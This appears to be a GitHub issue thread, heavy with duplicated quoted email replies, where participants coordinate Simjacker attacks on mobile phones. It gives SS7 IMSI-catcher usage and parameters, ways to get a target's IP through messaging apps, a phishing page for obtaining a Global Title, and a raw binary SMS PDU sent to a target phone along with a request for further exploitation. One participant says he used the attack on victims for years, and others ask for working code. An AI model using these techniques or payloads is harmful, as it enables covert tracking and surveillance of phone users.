Open theapache64 opened 4 years ago
It was working good 100% i used it since 2005 till 2019 2020 but after some numberin marcation update it stopped working first stopped working for telcel company, but i changed the smsc to at&t compani amd it worked again but then the numbering marcation changed for all main companys here and stopped working, i think it still work but it have to be send from a outside company smsc.
El mar., 2 de enero de 2024 1:36 p. m., alberto felizardo < @.***> escribió:
This way you only need the target phone number and the number to receive the sms wit the target info
El mar., 2 de enero de 2024 1:35 p. m., alberto felizardo < @.***> escribió:
Let me explain how the simjacker works the simcard internalli have something called toolkit application its like an internal browrer that execute commands from the sim carrier via OTA(over the air) you can send the simjacker command from the smsc carrier and it resend the sms to the victim and the victim phone send the info asked back as sms to the phone number you desire
El mar., 2 de enero de 2024 1:31 p. m., alberto felizardo < @.***> escribió:
Ita easy to get tatger ip he just need to use whatsap or any message app all apps need to connect p2p to transfer files or voipcalls it discloses target ip
El mar., 2 de enero de 2024 6:07 a. m., anyoneoruser < @.***> escribió:
To create a SIMJacker python program, you can try the pysimcard https://pypi.org/project/pysimcard/ librairy. To get the target IMSI number, it is possible to use an SS7 attack. I have found an IMSI catcher here https://github.com/orgs/SigPloit/repositories. SendIMSI.jar.zip https://github.com/theapache64/sim-jacker/files/13809345/SendIMSI.jar.zip To run it, download java here https://www.java.com/download/ie_manual.jsp if you don't have it and type the following command in your terminal:
java -jar SendIMSI.jar
Note that it will need 2 hard-to-get parameters (target IP address and your Global Title) to setup the IMSI catcher. But this is the value of the parameters that never change:
██████████@██████████ simsi % java -jar SendIMSI.jar
Frauding Target
[]Set Client PC: 1 []Set Peer PC: 2 []Set Client IP:
[ ]Set Client Port: 23481 []Set Peer IP: <your target public IP address(hard-to-get parameter)> []Set Peer Port: 4446 []Set Network Indicator [0] International [1] National: 0 []Set Target's MSISDN: <your target phone number(e.g +201150508833)> [*]Set your GT: <your Global Title(hard-to-get parameter)>To get your Global Title, try to create a webpage that send you the content of the navigator global variable and connecting to mobile data an then opening this "phishing" page on your phone, maybe you will find your Global Title in the content that the webpage sent you. For the ICCID, i have some infos here https://www.imei.info/faq-what-is-ICCID/.
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1873947395, or unsubscribe https://github.com/notifications/unsubscribe-auth/BBTCG3JAQGBXFXNC7CNMFQ3YMP2BVAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGM4TINZTHE2Q . You are receiving this because you were mentioned.Message ID: @.***>
Thats what i need help, someone out from this country to send the sms tho a phone from country and see if the phone responds to the sms
El mar., 2 de enero de 2024 1:39 p. m., alberto felizardo < @.***> escribió:
It was working good 100% i used it since 2005 till 2019 2020 but after some numberin marcation update it stopped working first stopped working for telcel company, but i changed the smsc to at&t compani amd it worked again but then the numbering marcation changed for all main companys here and stopped working, i think it still work but it have to be send from a outside company smsc.
El mar., 2 de enero de 2024 1:36 p. m., alberto felizardo < @.***> escribió:
This way you only need the target phone number and the number to receive the sms wit the target info
El mar., 2 de enero de 2024 1:35 p. m., alberto felizardo < @.***> escribió:
Let me explain how the simjacker works the simcard internalli have something called toolkit application its like an internal browrer that execute commands from the sim carrier via OTA(over the air) you can send the simjacker command from the smsc carrier and it resend the sms to the victim and the victim phone send the info asked back as sms to the phone number you desire
El mar., 2 de enero de 2024 1:31 p. m., alberto felizardo < @.***> escribió:
Ita easy to get tatger ip he just need to use whatsap or any message app all apps need to connect p2p to transfer files or voipcalls it discloses target ip
El mar., 2 de enero de 2024 6:07 a. m., anyoneoruser < @.***> escribió:
To create a SIMJacker python program, you can try the pysimcard https://pypi.org/project/pysimcard/ librairy. To get the target IMSI number, it is possible to use an SS7 attack. I have found an IMSI catcher here https://github.com/orgs/SigPloit/repositories. SendIMSI.jar.zip https://github.com/theapache64/sim-jacker/files/13809345/SendIMSI.jar.zip To run it, download java here https://www.java.com/download/ie_manual.jsp if you don't have it and type the following command in your terminal:
java -jar SendIMSI.jar
Note that it will need 2 hard-to-get parameters (target IP address and your Global Title) to setup the IMSI catcher. But this is the value of the parameters that never change:
██████████@██████████ simsi % java -jar SendIMSI.jar
Frauding Target
[]Set Client PC: 1 []Set Peer PC: 2 []Set Client IP:
[ ]Set Client Port: 23481 []Set Peer IP: <your target public IP address(hard-to-get parameter)> []Set Peer Port: 4446 []Set Network Indicator [0] International [1] National: 0 []Set Target's MSISDN: <your target phone number(e.g +201150508833)> [*]Set your GT: <your Global Title(hard-to-get parameter)>To get your Global Title, try to create a webpage that send you the content of the navigator global variable and connecting to mobile data an then opening this "phishing" page on your phone, maybe you will find your Global Title in the content that the webpage sent you. For the ICCID, i have some infos here https://www.imei.info/faq-what-is-ICCID/.
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1873947395, or unsubscribe https://github.com/notifications/unsubscribe-auth/BBTCG3JAQGBXFXNC7CNMFQ3YMP2BVAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGM4TINZTHE2Q . You are receiving this because you were mentioned.Message ID: @.***>
Let's make an attempt from my country to see if it will work
On Tue, Jan 2, 2024, 20:43 trufa10008000 @.***> wrote:
Thats what i need help, someone out from this country to send the sms tho a phone from country and see if the phone responds to the sms
El mar., 2 de enero de 2024 1:39 p. m., alberto felizardo < @.***> escribió:
It was working good 100% i used it since 2005 till 2019 2020 but after some numberin marcation update it stopped working first stopped working for telcel company, but i changed the smsc to at&t compani amd it worked again but then the numbering marcation changed for all main companys here and stopped working, i think it still work but it have to be send from a outside company smsc.
El mar., 2 de enero de 2024 1:36 p. m., alberto felizardo < @.***> escribió:
This way you only need the target phone number and the number to receive the sms wit the target info
El mar., 2 de enero de 2024 1:35 p. m., alberto felizardo < @.***> escribió:
Let me explain how the simjacker works the simcard internalli have something called toolkit application its like an internal browrer that execute commands from the sim carrier via OTA(over the air) you can send the simjacker command from the smsc carrier and it resend the sms to the victim and the victim phone send the info asked back as sms to the phone number you desire
El mar., 2 de enero de 2024 1:31 p. m., alberto felizardo < @.***> escribió:
Ita easy to get tatger ip he just need to use whatsap or any message app all apps need to connect p2p to transfer files or voipcalls it discloses target ip
El mar., 2 de enero de 2024 6:07 a. m., anyoneoruser < @.***> escribió:
To create a SIMJacker python program, you can try the pysimcard https://pypi.org/project/pysimcard/ librairy. To get the target IMSI number, it is possible to use an SS7 attack. I have found an IMSI catcher here https://github.com/orgs/SigPloit/repositories. SendIMSI.jar.zip < https://github.com/theapache64/sim-jacker/files/13809345/SendIMSI.jar.zip>
To run it, download java here https://www.java.com/download/ie_manual.jsp if you don't have it and type the following command in your terminal:
java -jar SendIMSI.jar
Note that it will need 2 hard-to-get parameters (target IP address and your Global Title) to setup the IMSI catcher. But this is the value of the parameters that never change:
██████████@██████████ simsi % java -jar SendIMSI.jar
Frauding Target
[]Set Client PC: 1 []Set Peer PC: 2 []Set Client IP:
[ ]Set Client Port: 23481 []Set Peer IP: <your target public IP address(hard-to-get parameter)> []Set Peer Port: 4446 []Set Network Indicator [0] International [1] National: 0 []Set Target's MSISDN: <your target phone number(e.g +201150508833)> [*]Set your GT: <your Global Title(hard-to-get parameter)>To get your Global Title, try to create a webpage that send you the content of the navigator global variable and connecting to mobile data an then opening this "phishing" page on your phone, maybe you will find your Global Title in the content that the webpage sent you. For the ICCID, i have some infos here https://www.imei.info/faq-what-is-ICCID/.
— Reply to this email directly, view it on GitHub < https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1873947395>,
or unsubscribe < https://github.com/notifications/unsubscribe-auth/BBTCG3JAQGBXFXNC7CNMFQ3YMP2BVAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGM4TINZTHE2Q>
. You are receiving this because you were mentioned.Message ID: @.***>
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1874467132, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKAEPK6ANPBVK237G6M3GL3YMRPNZAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGQ2DMNZRGMZA . You are receiving this because you were mentioned.Message ID: @.***>
sure one sec we have to adjust the parameters so it can be send from your country smsc we need the smsc number its easy to get usually its used to send the sms let me make a note explaining all teh needed stuff to make it work
http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail Virus-free.www.avg.com http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail <#DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2>
El mar, 2 ene 2024 a las 15:00, Ilori-Jaiyeola @.***>) escribió:
Let's make an attempt from my country to see if it will work
On Tue, Jan 2, 2024, 20:43 trufa10008000 @.***> wrote:
Thats what i need help, someone out from this country to send the sms tho a phone from country and see if the phone responds to the sms
El mar., 2 de enero de 2024 1:39 p. m., alberto felizardo < @.***> escribió:
It was working good 100% i used it since 2005 till 2019 2020 but after some numberin marcation update it stopped working first stopped working for telcel company, but i changed the smsc to at&t compani amd it worked again but then the numbering marcation changed for all main companys here and stopped working, i think it still work but it have to be send from a outside company smsc.
El mar., 2 de enero de 2024 1:36 p. m., alberto felizardo < @.***> escribió:
This way you only need the target phone number and the number to receive the sms wit the target info
El mar., 2 de enero de 2024 1:35 p. m., alberto felizardo < @.***> escribió:
Let me explain how the simjacker works the simcard internalli have something called toolkit application its like an internal browrer that execute commands from the sim carrier via OTA(over the air) you can send the simjacker command from the smsc carrier and it resend the sms to the victim and the victim phone send the info asked back as sms to the phone number you desire
El mar., 2 de enero de 2024 1:31 p. m., alberto felizardo < @.***> escribió:
Ita easy to get tatger ip he just need to use whatsap or any message app all apps need to connect p2p to transfer files or voipcalls it discloses target ip
El mar., 2 de enero de 2024 6:07 a. m., anyoneoruser < @.***> escribió:
To create a SIMJacker python program, you can try the pysimcard https://pypi.org/project/pysimcard/ librairy. To get the target IMSI number, it is possible to use an SS7 attack. I have found an IMSI catcher here https://github.com/orgs/SigPloit/repositories. SendIMSI.jar.zip <
https://github.com/theapache64/sim-jacker/files/13809345/SendIMSI.jar.zip>
To run it, download java here https://www.java.com/download/ie_manual.jsp if you don't have it and type the following command in your terminal:
java -jar SendIMSI.jar
Note that it will need 2 hard-to-get parameters (target IP address and your Global Title) to setup the IMSI catcher. But this is the value of the parameters that never change:
██████████@██████████ simsi % java -jar SendIMSI.jar
Frauding Target
[]Set Client PC: 1 []Set Peer PC: 2 []Set Client IP:
[ ]Set Client Port: 23481 []Set Peer IP: <your target public IP address(hard-to-get parameter)> []Set Peer Port: 4446 []Set Network Indicator [0] International [1] National: 0 []Set Target's MSISDN: <your target phone number(e.g +201150508833)> [*]Set your GT: <your Global Title(hard-to-get parameter)>To get your Global Title, try to create a webpage that send you the content of the navigator global variable and connecting to mobile data an then opening this "phishing" page on your phone, maybe you will find your Global Title in the content that the webpage sent you. For the ICCID, i have some infos here https://www.imei.info/faq-what-is-ICCID/.
— Reply to this email directly, view it on GitHub <
https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1873947395>,
or unsubscribe <
. You are receiving this because you were mentioned.Message ID: @.***>
— Reply to this email directly, view it on GitHub < https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1874467132>,
or unsubscribe < https://github.com/notifications/unsubscribe-auth/AKAEPK6ANPBVK237G6M3GL3YMRPNZAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGQ2DMNZRGMZA>
. You are receiving this because you were mentioned.Message ID: @.***>
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1874554179, or unsubscribe https://github.com/notifications/unsubscribe-auth/BBTCG3JGKRDGB5P7XCMELT3YMRYNXAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGQ2TKNBRG44Q . You are receiving this because you were mentioned.Message ID: @.***>
I have found a fuzzer in on github in the SigPloit diameter module: fuzzer.py.zip This is an example of use(from a python script that need to be in the same folder):
# packages import
from fuzzer import Fuzzer
fuzzer=Fuzzer()# create a fuzzer
# class testing
"""
You can now use the following methods to get the object information:getSQPStrings, getXSSStrings, getLDAPInjectionStrings, getXPATHInjectionStrings, getXMLInjectionStrings and getPathTraversalStrings(limit=10).
You can also use the following methods to generate random things:getRandomHTMLStrings(min_tags=5, max_tags=20), getRandomString(regexp=None, minLen=5, maxLen=50) and getRandomStrings(regexp=None, minLen=5, maxLen=50, num = 50)
To finish, they have 2 methods that you can use to operate some tasks related to diameter networking:getAddress and getDiamIdentities(fqdn, proto = ["diameter", "radius","tacacs+","kerberos"], transport = ["tcp", "sctp", "udp", "icmp", "gre"])
"""
So if the attacking scripts stop working, you can try fuzzing.
I am in Nigeria
On Wed, Jan 3, 2024, 05:49 anyoneoruser @.***> wrote:
I have found a fuzzer in on github in the SigPloit https://github.com/orgs/SigPloit/repositories diameter module: fuzzer.py.zip https://github.com/theapache64/sim-jacker/files/13815694/fuzzer.py.zip This is an example of use(from a python script that need to be in the same folder:
packages importfrom fuzzer import Fuzzerfuzzer=Fuzzer()# create a fuzzer# class testing"""You can now use the following methods to get the object information:getSQPStrings, getXSSStrings, getLDAPInjectionStrings, getXPATHInjectionStrings, getXMLInjectionStrings and getPathTraversalStrings(limit=10).You can also use the following methods to generate random things:getRandomHTMLStrings(min_tags=5, max_tags=20), getRandomString(regexp=None, minLen=5, maxLen=50) and getRandomStrings(regexp=None, minLen=5, maxLen=50, num = 50)To finish, they have 2 methods that you can use to operate some tasks related to diameter networking:getAddress and getDiamIdentities(fqdn, proto = ["diameter", "radius","tacacs+","kerberos"], transport = ["tcp", "sctp", "udp", "icmp", "gre"])"""
So if the attacking scripts stop working, you can try fuzzing.
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1874845595, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKAEPKY6R66COZKXE2HUXKLYMTPODAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGQ4DINJVHE2Q . You are receiving this because you were mentioned.Message ID: @.***>
Thank you, @trufa10008000. I have done a mistake. I think that pysimcard is adapted for internet providers but not for SIMJacker. Pysim may be better.
Le mer. 3 janv. 2024 à 12:26, Ilori-Jaiyeola @.***> a écrit :
I am in Nigeria
On Wed, Jan 3, 2024, 05:49 anyoneoruser @.***> wrote:
I have found a fuzzer in on github in the SigPloit https://github.com/orgs/SigPloit/repositories diameter module: fuzzer.py.zip https://github.com/theapache64/sim-jacker/files/13815694/fuzzer.py.zip
This is an example of use(from a python script that need to be in the same folder:
packages importfrom fuzzer import Fuzzerfuzzer=Fuzzer()# create a
fuzzer# class testing"""You can now use the following methods to get the object information:getSQPStrings, getXSSStrings, getLDAPInjectionStrings, getXPATHInjectionStrings, getXMLInjectionStrings and getPathTraversalStrings(limit=10).You can also use the following methods to generate random things:getRandomHTMLStrings(min_tags=5, max_tags=20), getRandomString(regexp=None, minLen=5, maxLen=50) and getRandomStrings(regexp=None, minLen=5, maxLen=50, num = 50)To finish, they have 2 methods that you can use to operate some tasks related to diameter networking:getAddress and getDiamIdentities(fqdn, proto = ["diameter", "radius","tacacs+","kerberos"], transport = ["tcp", "sctp", "udp", "icmp", "gre"])"""
So if the attacking scripts stop working, you can try fuzzing.
— Reply to this email directly, view it on GitHub < https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1874845595>,
or unsubscribe < https://github.com/notifications/unsubscribe-auth/AKAEPKY6R66COZKXE2HUXKLYMTPODAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGQ4DINJVHE2Q>
. You are receiving this because you were mentioned.Message ID: @.***>
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1875065604, or unsubscribe https://github.com/notifications/unsubscribe-auth/BALQDLT6EJTRLKINSNY3AYLYMUP27AVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGUYDMNJWGA2A . You are receiving this because you commented.Message ID: @.***>
Dont worry we can make both work, i about togo home then i can male the documento explaining the stuff
El mié., 3 de enero de 2024 6:29 a. m., anyoneoruser < @.***> escribió:
Thank you, @trufa10008000. I have done a mistake. I think that pysimcard is adapted for internet providers but not for SIMJacker. Pysim https://pypi.org/project/pysim/ may be better. Here https://doc.pysim.org/tutorial.html is the pysim docs.
Le mer. 3 janv. 2024 à 12:26, Ilori-Jaiyeola @.***> a écrit :
I am in Nigeria
On Wed, Jan 3, 2024, 05:49 anyoneoruser @.***> wrote:
I have found a fuzzer in on github in the SigPloit https://github.com/orgs/SigPloit/repositories diameter module: fuzzer.py.zip < https://github.com/theapache64/sim-jacker/files/13815694/fuzzer.py.zip>
This is an example of use(from a python script that need to be in the same folder:
packages importfrom fuzzer import Fuzzerfuzzer=Fuzzer()# create a
fuzzer# class testing"""You can now use the following methods to get the object information:getSQPStrings, getXSSStrings, getLDAPInjectionStrings, getXPATHInjectionStrings, getXMLInjectionStrings and getPathTraversalStrings(limit=10).You can also use the following methods to generate random things:getRandomHTMLStrings(min_tags=5, max_tags=20), getRandomString(regexp=None, minLen=5, maxLen=50) and getRandomStrings(regexp=None, minLen=5, maxLen=50, num = 50)To finish, they have 2 methods that you can use to operate some tasks related to diameter networking:getAddress and getDiamIdentities(fqdn, proto = ["diameter", "radius","tacacs+","kerberos"], transport = ["tcp", "sctp", "udp", "icmp", "gre"])"""
So if the attacking scripts stop working, you can try fuzzing.
— Reply to this email directly, view it on GitHub <
https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1874845595>,
or unsubscribe <
. You are receiving this because you were mentioned.Message ID: @.***>
— Reply to this email directly, view it on GitHub < https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1875065604>,
or unsubscribe < https://github.com/notifications/unsubscribe-auth/BALQDLT6EJTRLKINSNY3AYLYMUP27AVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGUYDMNJWGA2A>
. You are receiving this because you commented.Message ID: @.***>
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1875297571, or unsubscribe https://github.com/notifications/unsubscribe-auth/BBTCG3I2OKRTJRK4VXUVNDTYMVFI7AVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOBXGUZDSNZVG4YQ . You are receiving this because you were mentioned.Message ID: @.***>
Made a video about loading an STK applet on sim with ShadySim https://youtu.be/F55eJr40CoQ
Video is unavailable can send me on my email please
Video is unavailable can send me on my email please my email address yyy11155t@gmail.com
Video unavailable, send me here on @.***
On Sun, 28 Jan 2024, 3:43 pm usman79h, @.***> wrote:
Video is unavailable can send me on my email please my email address @.***
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1913551232, or unsubscribe https://github.com/notifications/unsubscribe-auth/BCE5HCH6N2Z7S5CIUWXYLZLYQYTWVAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOJRGM2TKMJSGMZA . You are receiving this because you commented.Message ID: @.***>
Can you send me demo (video) please
On Sun, 28 Jan 2024, 3:53 pm DragonAriyan, @.***> wrote:
Video unavailable, send me here on @.***
On Sun, 28 Jan 2024, 3:43 pm usman79h, @.***> wrote:
Video is unavailable can send me on my email please my email address @.***
— Reply to this email directly, view it on GitHub < https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1913551232>,
or unsubscribe < https://github.com/notifications/unsubscribe-auth/BCE5HCH6N2Z7S5CIUWXYLZLYQYTWVAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOJRGM2TKMJSGMZA>
. You are receiving this because you commented.Message ID: @.***>
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-1913553485, or unsubscribe https://github.com/notifications/unsubscribe-auth/BEXEPZNCEXOFC4EHUHTMQY3YQYU3JAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TCOJRGM2TKMZUHA2Q . You are receiving this because you commented.Message ID: @.***>
You can also use javacard with sim.toolkit, pythoncard or pysim(not the python pakage that is made for simulation).
Do Anyone have any working POC of this? like Source code/ App to send APDU Messages and a detailed guide on how to send it and how to find the binary to get location details in response?
im back guys sorry had to travel far, lets continue with the stuff please help fixing it
Look at what i wrote on github, there is links to what you are searching for.
Le mardi 2 avril 2024, periquillosarniento @.***> a écrit :
im back guys sorry had to travel far, lets continue with the stuff please help fixing it
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-2032611399, or unsubscribe https://github.com/notifications/unsubscribe-auth/BALQDLRS45WVB3ZJSDGHVQTY3LRTTAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TEMBTGI3DCMJTHE4Q . You are receiving this because you commented.Message ID: @.***>
So Y'all can tell me from what to what our chat became? have we finally got sim jacking?
i have the code but stopped working from my country(if send from telco local), still working from diferent countrys. help fixing?
What Youre using? twillio?
Finally, I've been able to send Binary PDU Messages and i have identified a network over which they aren't blocked yet. So Now comming over to the question, How to exploit it further? Currently I sended a binary message:
0041000B912143658709F07FF63802700000330D0000000050534800000000000042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
2143658709F0 means the phone number is (123) 45678900
It flashed on the target phone with Invalide Incomming Message! How to further exploit it ?
ok wanna get in contact to change the code to get further stuff? any email? or private chat? i got the codes and know how to change them
ok wanna get in contact to change the code to get further stuff? any email? or private chat? i got the codes and know how to change them
Sure. I've emailed you on this for further collaboration. I'm lacking simtrace actually which is restricting me from further testing.
ok wanna get in contact to change the code to get further stuff? any email? or private chat? i got the codes and know how to change them
I have created a community on Discord for this. Everyone can join in so that a compiled form of efforts results in benefit to everyone on the open source community!
Hi Everyone! I find simjacker to be fascinating. This is a great project. I was hoping to join you on both here and on discord if invites are still possible.
Thank you!
Of course you can join us on discord
On Fri, Jun 7, 2024, 06:14 everydaze @.***> wrote:
Hi Everyone! I find simjacker to be fascinating. This is a great project. I was hoping to join you on both here and on discord if invites are still possible.
Thank you!
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-2154039343, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKAEPK7CP4HBXVVRKBXCMILZGE6UNAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TEMJVGQYDGOJTGQZQ . You are receiving this because you were mentioned.Message ID: @.***>
Thank you so much! May I have a new invite for discord please?
The one listed has expired.
Thank you!
Sent from Proton Mail for iOS
On Fri, Jun 7, 2024 at 4:56 AM, Ilori-Jaiyeola @.***(mailto:On Fri, Jun 7, 2024 at 4:56 AM, Ilori-Jaiyeola < wrote:
Of course you can join us on discord
On Fri, Jun 7, 2024, 06:14 everydaze @.***> wrote:
Hi Everyone! I find simjacker to be fascinating. This is a great project. I was hoping to join you on both here and on discord if invites are still possible.
Thank you!
— Reply to this email directly, view it on GitHub https://github.com/theapache64/sim-jacker/issues/1#issuecomment-2154039343, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKAEPK7CP4HBXVVRKBXCMILZGE6UNAVCNFSM4IWJJVGKU5DIOJSWCZC7NNSXTN2JONZXKZKDN5WW2ZLOOQ5TEMJVGQYDGOJTGQZQ . You are receiving this because you were mentioned.Message ID: @.***>
— Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.Message ID: @.***>
Any chance someone can send me a current discord invite please? I'd like to join the group and share whatever I can contribute. Thank you
Is this still active? OR where the regular discussion is going on?
Website: https://simjacker.com :globe_with_meridians: News : https://thehackernews.com/2019/09/simjacker-mobile-hacking.html :newspaper: Reddit : https://www.reddit.com/r/simjacking
What do you have ?